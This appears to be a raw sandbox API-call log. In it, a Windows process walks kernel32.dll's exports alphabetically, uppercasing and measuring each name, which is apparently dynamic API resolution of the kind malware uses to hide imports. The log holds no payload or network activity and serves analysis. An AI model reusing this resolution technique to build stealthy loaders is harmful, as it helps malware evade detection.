[0079.981] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.981] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0079.981] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0079.981] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.982] lstrlenA (lpString="kernel32.dll") returned 12 [0079.982] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0079.982] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0079.982] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0079.982] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0079.982] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0079.982] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0079.982] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0079.982] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0079.982] lstrlenA (lpString="ADDATOMA") returned 8 [0079.982] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0079.982] lstrlenA (lpString="ADDATOMW") returned 8 [0079.982] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0079.982] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0079.982] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0079.982] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0079.982] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0079.982] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0079.982] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0079.982] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0079.982] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0079.982] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0079.982] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0079.982] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0079.982] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0079.982] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0079.982] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0079.983] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0079.983] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0079.983] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0079.983] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0079.983] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0079.983] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0079.983] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0079.983] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0079.983] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0079.983] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0079.983] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0079.983] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0079.983] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0079.983] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0079.983] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0079.983] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0079.983] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0079.983] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0079.983] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0079.983] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0079.983] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0079.983] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0079.983] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0079.983] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0079.983] lstrlenA (lpString="BACKUPREAD") returned 10 [0079.983] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0079.983] lstrlenA (lpString="BACKUPSEEK") returned 10 [0079.983] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0079.983] lstrlenA (lpString="BACKUPWRITE") returned 11 [0079.983] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0079.983] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0079.983] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0079.983] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0079.983] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0079.983] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0079.983] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0079.984] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0079.984] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0079.984] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0079.984] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0079.984] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0079.984] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0079.984] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0079.984] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0079.984] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0079.984] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0079.984] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0079.984] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0079.984] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0079.984] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0079.984] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0079.984] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0079.984] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0079.984] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0079.984] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0079.984] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0079.984] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0079.984] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0079.984] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0079.984] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0079.984] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0079.984] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0079.984] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0079.984] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0079.984] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0079.984] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0079.984] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0079.984] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0079.984] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0079.984] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0079.984] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0079.984] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0079.985] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0079.985] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0079.985] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0079.985] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0079.985] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0079.985] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0079.985] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0079.985] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0079.985] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0079.985] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0079.985] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0079.985] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0079.985] lstrlenA (lpString="BEEP") returned 4 [0079.985] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0079.985] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0079.985] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0079.985] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0079.985] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0079.985] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0079.985] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0079.985] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0079.985] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0079.985] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0079.985] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0079.985] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0079.985] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0079.985] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0079.985] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0079.985] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0079.985] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0079.985] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0079.985] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0079.985] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0079.985] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0079.985] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0079.985] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0079.986] lstrlenA (lpString="CANCELIO") returned 8 [0079.986] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0079.986] lstrlenA (lpString="CANCELIOEX") returned 10 [0079.986] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0079.986] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0079.986] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0079.986] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0079.986] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0079.986] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0079.986] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0079.986] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0079.986] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0079.986] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0079.986] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0079.986] lstrlenA (lpString="CHECKELEVATION") returned 14 [0079.986] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0079.986] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0079.986] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0079.986] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0079.986] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0079.986] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0079.986] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0079.986] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0079.986] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0079.986] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0079.986] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0079.986] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0079.986] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0079.986] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0079.986] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0079.986] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0079.986] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0079.986] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0079.986] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0079.986] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0079.986] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0079.987] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0079.987] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0079.987] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0079.987] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0079.987] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0079.987] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0079.987] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0079.987] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0079.987] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0079.987] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0079.987] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0079.987] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0079.987] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0079.987] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0079.987] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0079.987] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0079.987] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0079.987] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0079.987] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0079.987] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0079.987] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0079.987] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0079.987] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0079.987] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0079.987] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0079.987] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0079.987] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0079.987] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0079.987] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0079.987] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0079.987] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0079.987] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0079.987] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0079.987] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0079.987] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0079.987] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0079.987] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0079.988] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0079.988] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0079.988] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0079.988] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0079.988] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0079.988] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0079.988] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0079.988] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0079.988] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0079.988] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0079.988] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0079.988] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0079.988] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0079.988] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0079.988] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0079.988] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0079.988] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0079.988] lstrlenA (lpString="COPYCONTEXT") returned 11 [0079.988] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0079.988] lstrlenA (lpString="COPYFILEA") returned 9 [0079.988] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0079.988] lstrlenA (lpString="COPYFILEEXA") returned 11 [0079.988] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0079.988] lstrlenA (lpString="COPYFILEEXW") returned 11 [0079.988] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0079.988] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0079.988] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0079.988] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0079.988] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0079.988] lstrlenA (lpString="COPYFILEW") returned 9 [0079.988] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0079.988] lstrlenA (lpString="COPYLZFILE") 